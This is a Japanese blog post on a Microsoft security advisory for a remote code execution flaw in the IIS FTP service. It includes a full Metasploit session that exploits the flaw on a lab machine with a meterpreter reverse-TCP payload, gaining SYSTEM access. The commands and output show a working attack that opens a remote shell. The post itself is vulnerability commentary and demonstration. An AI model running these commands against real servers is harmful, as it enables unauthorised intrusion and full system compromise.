昨日Microsoftからセキュリティアドバイザリーが公開されたのですが、IISでFTPを使用しているWindows2000のIIS5.0からWindows2003R2 のIIS6.0まで全てのサーバーに影響が在ると言う深刻なものです。
マイクロソフト セキュリティ アドバイザリ (KB975191)
インターネット インフォメーション サービスの FTP サービスの脆弱性により、リモートでコードが実行される
今月修正パッチリリース予定とはいえ、攻撃コードも公開されているので、管理者は気が気ではないですね(^^;
=[ msf v3.3-dev
+ -- --=[ 403 exploits - 273 payloads
+ -- --=[ 21 encoders - 8 nops
=[ 193 aux
msf > use exploit/windows/ftp/microsoft_ftpd_nlst
msf exploit(microsoft_ftpd_nlst) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(microsoft_ftpd_nlst) > set LHOST 192.168.0.136
LHOST => 192.168.0.136
msf exploit(microsoft_ftpd_nlst) > set RHOST 192.168.0.128
RHOST => 192.168.0.128
msf exploit(microsoft_ftpd_nlst) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Connecting to FTP server 192.168.0.128:21...
[*] Connected to target FTP server.
[*] Authenticating as anonymous with password mozilla@example.com...
[*] Sending password...
[*] 257 "RTIXDYMRJB" directory created.
[*] 250 CWD command successful.
[*] Creating long directory...
[*] 257 "SQL(...中略...)ZKQTRMIEWETKWE" directory created.
[*] 200 PORT command successful.
[*] Trying target Windows 2000 SP4 Universal (IIS 5.0)...
[*] 150 Opening ASCII mode data connection for file list.
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.0.136:4444 -> 192.168.0.128:1076)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
|
攻撃方法を見た感じだと、めちゃくちゃ長い Wide型の名前を持つフォルダを作成するとバッファーオーバーフローがおき、攻撃コードを送り込めると言うものみたいです。
怖いっすね(^^;
ていうか、IISでFTPの機能を使用している場合しか影響を受けないってMicrosoftのコメントを見たけど、IIS入れたらデフォルトで FTPの機能有効にならなかったっけ(^^;?
関連記事:
インターネット インフォメーション サービスの FTP サービスの脆弱性により、リモートでコードが実行される
VUPEN Security - Private Exploits and PoCs Service / In-Depth Binary Analysis
マイクロソフト、IISの脆弱性に関するセキュリティアドバイザリを公開:ニュース - CNET Japan
livedoor ニュース - Microsoft、IISの脆弱性に対するアドバイザリーを公開
マイクロソフトのIISに含まれているFTPの脆弱性に対する攻撃が進行中 - Zero Day - ZDNet Japan
Translate
Comments